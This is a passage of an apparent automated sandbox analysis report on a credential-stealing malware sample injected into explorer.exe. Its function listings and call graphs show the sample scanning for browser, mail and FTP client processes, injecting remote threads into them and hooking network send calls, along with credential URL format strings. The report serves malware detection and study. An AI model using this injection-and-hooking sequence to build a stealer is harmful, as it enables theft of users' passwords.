9d1910 NtUnmapViewOfSection 983->985 984 9d1be1 LdrProcessRelocationBlock 984->985 984->986 985->961 986->984 986->985 987->981 987->985

                            Callgraph

                            • Executed
                            • Not Executed
                            • Opacity -> Relevance
                            • Disassembly available
                            callgraph 0 Function_009D1E5D 21 Function_009D1D80 0->21 1 Function_009D245E 40 Function_009D2861 1->40 2 Function_009D1819 6 Function_009D1B17 2->6 13 Function_009D2608 2->13 19 Function_009D1A80 2->19 3 Function_009D1C19 4 Function_009D24D5 5 Function_009D2815 7 Function_009D3417 8 Function_009D1016 8->2 11 Function_009D2592 8->11 8->13 29 Function_009D2731 8->29 30 Function_009D2573 8->30 31 Function_009D1332 8->31 32 Function_009D25AD 8->32 38 Function_009D10A4 8->38 8->40 9 Function_009D1493 12 Function_009D1752 9->12 15 Function_009D2404 9->15 16 Function_009D1647 9->16 17 Function_009D17C7 9->17 39 Function_009D26E6 9->39 41 Function_009D15E0 9->41 10 Function_009D1E93 14 Function_009D1F4A 14->5 23 Function_009D2843 14->23 26 Function_009D22B8 14->26 27 Function_009D2374 14->27 14->29 37 Function_009D22E5 14->37 14->40 43 Function_009D27E2 14->43 15->40 16->23 33 Function_009D24AE 16->33 16->40 17->39 17->40 18 Function_009D2806 20 Function_009D1DC0 20->3 21->3 22 Function_009D1000 22->8 23->13 24 Function_009D283F 24->13 25 Function_009D263E 26->39 28 Function_009D1EB6 28->14 28->23 28->40 31->4 31->9 31->13 31->23 31->25 31->40 42 Function_009D1DE3 31->42 34 Function_009D1469 34->9 34->13 35 Function_009D7728 36 Function_009D1425 36->9 36->13 37->40 37->43 38->2 38->11 38->13 38->29 38->30 38->32 38->40 41->23 42->0 42->5 42->10 42->20

                            Executed Functions

                            Function 009D1016 Relevance: 87.7, APIs: 30, Strings: 20, Instructions: 244stringsleepprocessCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 9d1016-9d1020 call 9d2608 3 9d1097-9d1098 0->3 4 9d1022-9d104b call 9d2861 RtlMoveMemory 0->4 7 9d104d-9d106b call 9d2861 RtlMoveMemory 4->7 8 9d1071-9d1090 NtUnmapViewOfSection GetCurrentProcessId 4->8 7->8 10 9d109e-9d10d7 call 9d10a4 call 9d2861 8->10 11 9d1092-9d1093 8->11 21 9d10dc-9d10ea CreateToolhelp32Snapshot 10->21 11->3 13 9d1095-9d1099 call 9d1332 11->13 13->10 22 9d10f0-9d1106 Process32First 21->22 23 9d1322-9d132d Sleep 21->23 24 9d110c-9d111e lstrcmpi 22->24 25 9d131b-9d131c FindCloseChangeNotification 22->25 23->21 26 9d1124-9d1132 lstrcmpi 24->26 27 9d1280-9d1289 call 9d25ad 24->27 25->23 26->27 28 9d1138-9d1146 lstrcmpi 26->28 33 9d128b-9d1294 call 9d2592 27->33 34 9d1305-9d1313 Process32Next 27->34 28->27 30 9d114c-9d115a lstrcmpi 28->30 30->27 32 9d1160-9d116a lstrcmpi 30->32 32->27 35 9d1170-9d117e lstrcmpi 32->35 33->34 41 9d1296-9d129d call 9d2573 33->41 34->24 36 9d1319 34->36 35->27 38 9d1184-9d1192 lstrcmpi 35->38 36->25 38->27 40 9d1198-9d11a6 lstrcmpi 38->40 40->27 42 9d11ac-9d11ba lstrcmpi 40->42 41->34 46 9d129f-9d12ac call 9d2608 41->46 42->27 45 9d11c0-9d11ce lstrcmpi 42->45 45->27 47 9d11d4-9d11e2 lstrcmpi 45->47 46->34 53 9d12ae-9d1300 lstrcmpi call 9d2731 call 9d1819 call 9d2731 46->53 47->27 49 9d11e8-9d11f6 lstrcmpi 47->49 49->27 50 9d11fc-9d120a lstrcmpi 49->50 50->27 52 9d120c-9d121a lstrcmpi 50->52 52->27 54 9d121c-9d122a lstrcmpi 52->54 53->34 54->27 56 9d122c-9d123a lstrcmpi 54->56 56->27 58 9d123c-9d124a lstrcmpi 56->58 58->27 60 9d124c-9d125a lstrcmpi 58->60 60->27 62 9d125c-9d126a lstrcmpi 60->62 62->27 64 9d126c-9d127a lstrcmpi 62->64 64->27 64->34
                            APIs
                              • Part of subcall function 009D2608: VirtualQuery.KERNEL32(009D4434,?,0000001C), ref: 009D2615
                              • Part of subcall function 009D2861: GetProcessHeap.KERNEL32(00000008,0000A000,009D10CC), ref: 009D2864
                              • Part of subcall function 009D2861: RtlAllocateHeap.NTDLL(00000000), ref: 009D286B
                            • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 009D1038
                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 009D106B
                            • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 009D1074
                            • GetCurrentProcessId.KERNEL32(?,009D1010), ref: 009D107A
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009D10DF
                            • Process32First.KERNEL32(00000000,?), ref: 009D10FE
                            • lstrcmpi.KERNEL32(?,firefox.exe), ref: 009D111A
                            • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 009D112E
                            • lstrcmpi.KERNEL32(?,chrome.exe), ref: 009D1142
                            • lstrcmpi.KERNEL32(?,opera.exe), ref: 009D1156
                            • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 009D1166
                            • lstrcmpi.KERNEL32(?,outlook.exe), ref: 009D117A
                            • lstrcmpi.KERNEL32(?,thebat.exe), ref: 009D118E
                            • lstrcmpi.KERNEL32(?,thebat32.exe), ref: 009D11A2
                            • lstrcmpi.KERNEL32(?,thebat64.exe), ref: 009D11B6
                            • lstrcmpi.KERNEL32(?,thunderbird.exe), ref: 009D11CA
                            • lstrcmpi.KERNEL32(?,filezilla.exe), ref: 009D11DE
                            • lstrcmpi.KERNEL32(?,smartftp.exe), ref: 009D11F2
                            • lstrcmpi.KERNEL32(?,winscp.exe), ref: 009D1206
                            • lstrcmpi.KERNEL32(?,flashfxp.exe), ref: 009D1216
                            • lstrcmpi.KERNEL32(?,cuteftppro.exe), ref: 009D1226
                            • lstrcmpi.KERNEL32(?,mailmaster.exe), ref: 009D1236
                            • lstrcmpi.KERNEL32(?,263em.exe), ref: 009D1246
                            • lstrcmpi.KERNEL32(?,foxmail.exe), ref: 009D1256
                            • lstrcmpi.KERNEL32(?,alimail.exe), ref: 009D1266
                            • lstrcmpi.KERNEL32(?,mailchat.exe), ref: 009D1276
                            • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 009D12B4
                            • Process32Next.KERNEL32(00000000,00000128), ref: 009D130B
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 009D131C
                            • Sleep.KERNELBASE(000003E8), ref: 009D1327
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateChangeCloseCreateCurrentFindFirstNextNotificationQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                            • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                            • API String ID: 831104905-1680033604
                            • Opcode ID: 9f8636360c684a4e30cedb68af07f4dbcf0cf5de5e379ae5c3e3e9729edc5f1e
                            • Instruction ID: 68a043bc8a7c1fe9c47eb22d6574d949c9c2f479f5eb5a9db318e71cb164cf95
                            • Opcode Fuzzy Hash: 9f8636360c684a4e30cedb68af07f4dbcf0cf5de5e379ae5c3e3e9729edc5f1e
                            • Instruction Fuzzy Hash: F571C4326C9305BBCB00EBB0DD45E6E7BACAF85781B44C52BFA50C3290DB31DA458A61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009D10A4 Relevance: 80.7, APIs: 26, Strings: 20, Instructions: 203stringsleepprocessCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 009D2861: GetProcessHeap.KERNEL32(00000008,0000A000,009D10CC), ref: 009D2864
                              • Part of subcall function 009D2861: RtlAllocateHeap.NTDLL(00000000), ref: 009D286B
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009D10DF
                            • Process32First.KERNEL32(00000000,?), ref: 009D10FE
                            • lstrcmpi.KERNEL32(?,firefox.exe), ref: 009D111A
                            • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 009D112E
                            • lstrcmpi.KERNEL32(?,chrome.exe), ref: 009D1142
                            • lstrcmpi.KERNEL32(?,opera.exe), ref: 009D1156
                            • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 009D1166
                            • lstrcmpi.KERNEL32(?,outlook.exe), ref: 009D117A
                            • lstrcmpi.KERNEL32(?,thebat.exe), ref: 009D118E
                            • lstrcmpi.KERNEL32(?,thebat32.exe), ref: 009D11A2
                            • lstrcmpi.KERNEL32(?,thebat64.exe), ref: 009D11B6
                            • lstrcmpi.KERNEL32(?,thunderbird.exe), ref: 009D11CA
                            • lstrcmpi.KERNEL32(?,filezilla.exe), ref: 009D11DE
                            • lstrcmpi.KERNEL32(?,smartftp.exe), ref: 009D11F2
                            • lstrcmpi.KERNEL32(?,winscp.exe), ref: 009D1206
                            • lstrcmpi.KERNEL32(?,flashfxp.exe), ref: 009D1216
                            • lstrcmpi.KERNEL32(?,cuteftppro.exe), ref: 009D1226
                            • lstrcmpi.KERNEL32(?,mailmaster.exe), ref: 009D1236
                            • lstrcmpi.KERNEL32(?,263em.exe), ref: 009D1246
                            • lstrcmpi.KERNEL32(?,foxmail.exe), ref: 009D1256
                            • lstrcmpi.KERNEL32(?,alimail.exe), ref: 009D1266
                            • lstrcmpi.KERNEL32(?,mailchat.exe), ref: 009D1276
                            • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 009D12B4
                            • Process32Next.KERNEL32(00000000,00000128), ref: 009D130B
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 009D131C
                            • Sleep.KERNELBASE(000003E8), ref: 009D1327
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcmpi$HeapProcess32$AllocateChangeCloseCreateFindFirstNextNotificationProcessSleepSnapshotToolhelp32
                            • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                            • API String ID: 2875627700-1680033604
                            • Opcode ID: 5ad7e21878a61541973baa7ac3117e3dab092547ba059d87b07399cca64cbf43
                            • Instruction ID: ac656cc791aa656af02ff08ca4b31545d6206553e2aadf26cd72d881b0ca39c8
                            • Opcode Fuzzy Hash: 5ad7e21878a61541973baa7ac3117e3dab092547ba059d87b07399cca64cbf43
                            • Instruction Fuzzy Hash: B851B4326C5305B7CB00DBB18D45E2EBBEC6F85781B44C52BFA50D3290EB21DA058A76
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009D7728 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 112 9d7728-9d7745 113 9d790d 112->113 114 9d774b-9d7758 112->114 113->113 115 9d776a-9d776f 114->115 116 9d7771 115->116 117 9d7760-9d7765 116->117 118 9d7773 116->118 119 9d7766-9d7768 117->119 120 9d7778-9d777a 118->120 119->115 119->116 121 9d777c-9d7781 120->121 122 9d7783-9d7787 120->122 121->122 122->120 123 9d7789 122->123 124 9d778b-9d7792 123->124 125 9d7794-9d7799 123->125 124->120 124->125 126 9d77a8-9d77aa 125->126 127 9d779b-9d77a4 125->127 130 9d77ac-9d77b1 126->130 131 9d77b3-9d77b7 126->131 128 9d781a-9d781d 127->128 129 9d77a6 127->129 132 9d7822-9d7825 128->132 129->126 130->131 133 9d77b9-9d77be 131->133 134 9d77c0-9d77c2 131->134 137 9d7827-9d7829 132->137 133->134 135 9d77e4-9d77f3 134->135 136 9d77c4 134->136 140 9d77f5-9d77fc 135->140 141 9d7804-9d7811 135->141 139 9d77c5-9d77c7 136->139 137->132 138 9d782b-9d782e 137->138 138->132 142 9d7830-9d784c 138->142 143 9d77c9-9d77ce 139->143 144 9d77d0-9d77d4 139->144 140->140 145 9d77fe 140->145 141->141 146 9d7813-9d7815 141->146 142->137 147 9d784e 142->147 143->144 144->139 148 9d77d6 144->148 145->119 146->119 149 9d7854-9d7858 147->149 150 9d77d8-9d77df 148->150 151 9d77e1 148->151 152 9d789f-9d78a2 149->152 153 9d785a-9d7870 LoadLibraryA 149->153 150->139 150->151 151->135 155 9d78a5-9d78ac 152->155 154 9d7871-9d7876 153->154 154->149 156 9d7878-9d787a 154->156 157 9d78ae-9d78b0 155->157 158 9d78d0-9d7900 VirtualProtect * 2 155->158 160 9d787c-9d7882 156->160 161 9d7883-9d7890 GetProcAddress 156->161 162 9d78c3-9d78ce 157->162 163 9d78b2-9d78c1 157->163 159 9d7904-9d7908 158->159 159->159 164 9d790a 159->164 160->161 165 9d7899-9d789c 161->165 166 9d7892-9d7897 161->166 162->163 163->155 164->113 166->154
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507961245.00000000009D6000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D6000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d6000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2f0812814e54d7b09d823457a42c24fd0062391d39e89deffcc6f363dc4bff8b
                            • Instruction ID: 37db1a290c15fde1efa935f5f2349e8d490d595768adf0d865f65ce52dbb0077
                            • Opcode Fuzzy Hash: 2f0812814e54d7b09d823457a42c24fd0062391d39e89deffcc6f363dc4bff8b
                            • Instruction Fuzzy Hash: AF51087198C3924FD7214AF8CCC46A4FBA4DB52320B194A7BC5E5CB3C2F7985805D760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009D2861 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 167 9d2861-9d2871 GetProcessHeap RtlAllocateHeap
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,0000A000,009D10CC), ref: 009D2864
                            • RtlAllocateHeap.NTDLL(00000000), ref: 009D286B
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID:
                            • API String ID: 1357844191-0
                            • Opcode ID: a92781d05a288ca752a2145d5170ff4540416c97cd5b91b819ede5d09cfd4e52
                            • Instruction ID: 843eba1c809923c0e759aea9dbafb9e68461a72f6d881f013ef13c43724043f3
                            • Opcode Fuzzy Hash: a92781d05a288ca752a2145d5170ff4540416c97cd5b91b819ede5d09cfd4e52
                            • Instruction Fuzzy Hash: 6BA002715B51407FDD4557A4ED0DF553B19A745703F0085457149D5060996455CC9723
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 009D1819 Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 208injectionnativesleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 009D2608: VirtualQuery.KERNEL32(009D4434,?,0000001C), ref: 009D2615
                            • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,77296900,microsoftedgecp.exe,?), ref: 009D184E
                            • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 009D1889
                            • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 009D1919
                            • RtlMoveMemory.NTDLL(00000000,009D3428,00000016), ref: 009D1940
                            • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 009D1968
                            • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 009D1978
                            • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009D1992
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 009D199A
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 009D19A8
                            • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 009D19AF
                            • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 009D19C5
                            • GetProcAddress.KERNEL32(00000000), ref: 009D19CC
                            • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 009D19E2
                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 009D1A0C
                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009D1A1F
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 009D1A26
                            • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 009D1A2D
                            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 009D1A41
                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 009D1A58
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 009D1A65
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 009D1A6B
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 009D1A71
                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 009D1A74
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                            • String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                            • API String ID: 1066286714-4141090125
                            • Opcode ID: f25120cae0ef6f21b55f624a47268497a64dc0fc8f696f6c7fc923b84648a45d
                            • Instruction ID: d93bee55abcdb8025069d3fea72699119c567723c592da6a0aa343cd4c49b888
                            • Opcode Fuzzy Hash: f25120cae0ef6f21b55f624a47268497a64dc0fc8f696f6c7fc923b84648a45d
                            • Instruction Fuzzy Hash: D661AE7228A304BFD310DF61DD84E6BBBECEF88755F00852AF94993251D634DE448B62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009D263E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 009D265A
                            • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 009D2672
                            • lstrlen.KERNEL32(?,00000000), ref: 009D267A
                            • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 009D2685
                            • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 009D269F
                            • wsprintfA.USER32 ref: 009D26B6
                            • CryptDestroyHash.ADVAPI32(?), ref: 009D26CF
                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 009D26D9
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                            • String ID: %02X
                            • API String ID: 3341110664-436463671
                            • Opcode ID: e26226bf92e47920be24930df1f2c5cad7fa7a11144a911e07a41caa797ef62a
                            • Instruction ID: bb9552b7e2416a9bbc4d8040b56e8aa9e4bc06a5e2ef6f3ba8aba3a73d10da70
                            • Opcode Fuzzy Hash: e26226bf92e47920be24930df1f2c5cad7fa7a11144a911e07a41caa797ef62a
                            • Instruction Fuzzy Hash: 91114F7194510CBFDB119BA5ED88EAEBFBCFB44742F108066F605E2150D7718F41AB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009D1332 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 94libraryloadersleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 009D2861: GetProcessHeap.KERNEL32(00000008,0000A000,009D10CC), ref: 009D2864
                              • Part of subcall function 009D2861: RtlAllocateHeap.NTDLL(00000000), ref: 009D286B
                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,009D109E,?,009D1010), ref: 009D134A
                            • GetCurrentProcessId.KERNEL32(00000003,?,009D109E,?,009D1010), ref: 009D135B
                            • wsprintfA.USER32 ref: 009D1372
                              • Part of subcall function 009D263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 009D265A
                              • Part of subcall function 009D263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 009D2672
                              • Part of subcall function 009D263E: lstrlen.KERNEL32(?,00000000), ref: 009D267A
                              • Part of subcall function 009D263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 009D2685
                              • Part of subcall function 009D263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 009D269F
                              • Part of subcall function 009D263E: wsprintfA.USER32 ref: 009D26B6
                              • Part of subcall function 009D263E: CryptDestroyHash.ADVAPI32(?), ref: 009D26CF
                              • Part of subcall function 009D263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 009D26D9
                            • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 009D1389
                            • GetLastError.KERNEL32 ref: 009D138F
                            • Sleep.KERNEL32(000001F4), ref: 009D13A1
                              • Part of subcall function 009D24D5: GetCurrentProcessId.KERNEL32 ref: 009D24E7
                              • Part of subcall function 009D24D5: GetCurrentThreadId.KERNEL32 ref: 009D24EF
                              • Part of subcall function 009D24D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 009D24FF
                              • Part of subcall function 009D24D5: Thread32First.KERNEL32(00000000,0000001C), ref: 009D250D
                              • Part of subcall function 009D24D5: CloseHandle.KERNEL32(00000000), ref: 009D2566
                            • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 009D13B8
                            • GetProcAddress.KERNEL32(00000000), ref: 009D13BF
                            • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 009D13E4
                            • GetProcAddress.KERNEL32(00000000), ref: 009D13EB
                              • Part of subcall function 009D1DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 009D1E1D
                            • RtlExitUserThread.NTDLL(00000000), ref: 009D141D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                            • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                            • API String ID: 706757162-1430290102
                            • Opcode ID: 43786fa54a131a09d4bdbc016155acbe2b6c63a2ea26f420f12472457c551243
                            • Instruction ID: 2b8191c8dd2e41416fd91d9ceebef8570e72fa6251135074718c91fb926ca4fe
                            • Opcode Fuzzy Hash: 43786fa54a131a09d4bdbc016155acbe2b6c63a2ea26f420f12472457c551243
                            • Instruction Fuzzy Hash: 613166317C9214BBCB106FA0DD0AB6E3B59AF95747F00C027FA05973A1CF758A519792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009D1647 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 91stringnetworkCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 235 9d1647-9d165a 236 9d1748-9d174f 235->236 237 9d1660-9d1662 235->237 237->236 238 9d1668-9d166b 237->238 238->236 239 9d1671-9d167d lstrlen 238->239 240 9d1747 239->240 241 9d1683-9d168a lstrlen 239->241 240->236 241->240 242 9d1690-9d16a8 getpeername 241->242 242->240 243 9d16ae-9d16ca inet_ntoa htons 242->243 243->240 244 9d16cc-9d16d4 243->244 245 9d1708 244->245 246 9d16d6-9d16d9 244->246 249 9d170d-9d173c call 9d2861 wsprintfA call 9d24ae 245->249 247 9d16db-9d16de 246->247 248 9d16f3-9d16f8 246->248 250 9d1701-9d1706 247->250 251 9d16e0-9d16e3 247->251 248->249 249->240 259 9d173e-9d1745 call 9d2843 249->259 250->249 253 9d16fa-9d16ff 251->253 254 9d16e5-9d16ea 251->254 253->249 254->248 256 9d16ec-9d16f1 254->256 256->240 256->248 259->240
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                            • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                            • API String ID: 3379139566-1703351401
                            • Opcode ID: f676f92af0c6ff66c5822e62ca56dfce190a0eeb9db384d4f5553db5fd7ce93e
                            • Instruction ID: 1977f45b700c9ebd3b160bc018f8a96e90c40a2d71f935381f291ae06dc5100c
                            • Opcode Fuzzy Hash: f676f92af0c6ff66c5822e62ca56dfce190a0eeb9db384d4f5553db5fd7ce93e
                            • Instruction Fuzzy Hash: C2218337E8030977DF115FA98D885BE7AAD9B55342B04C077E914D3331DA34CE419A61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009D1752 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 267 9d1752-9d1774 GetModuleHandleA GetProcAddress 268 9d1776-9d17c0 RtlZeroMemory * 4 267->268 269 9d17c1-9d17c6 267->269 268->269
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,009D1539,?,?,?,009D144B,?), ref: 009D1763
                            • GetProcAddress.KERNEL32(00000000), ref: 009D176A
                            • RtlZeroMemory.NTDLL(009D4228,00000104), ref: 009D1788
                            • RtlZeroMemory.NTDLL(009D4118,00000104), ref: 009D1790
                            • RtlZeroMemory.NTDLL(009D4330,00000104), ref: 009D1798
                            • RtlZeroMemory.NTDLL(009D4000,00000104), ref: 009D17A1
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: MemoryZero$AddressHandleModuleProc
                            • String ID: %s%s%s%s$ntdll.dll$sscanf
                            • API String ID: 1490332519-278825019
                            • Opcode ID: 55044c69446e0a667f1532d856378e7892a75e6c65e0c55c6a1cb80823939a81
                            • Instruction ID: 309b9c04b7cbffc03bb3c04199ed2187d411486f03e2476f3ab3cf6a881532eb
                            • Opcode Fuzzy Hash: 55044c69446e0a667f1532d856378e7892a75e6c65e0c55c6a1cb80823939a81
                            • Instruction Fuzzy Hash: 70F01962BD532C37812023EAAC4AD5BBE5CC6D1FAF302C167B75463341D9B5694045B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009D24D5 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetCurrentProcessId.KERNEL32 ref: 009D24E7
                            • GetCurrentThreadId.KERNEL32 ref: 009D24EF
                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 009D24FF
                            • Thread32First.KERNEL32(00000000,0000001C), ref: 009D250D
                            • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 009D252C
                            • SuspendThread.KERNEL32(00000000), ref: 009D253C
                            • CloseHandle.KERNEL32(00000000), ref: 009D254B
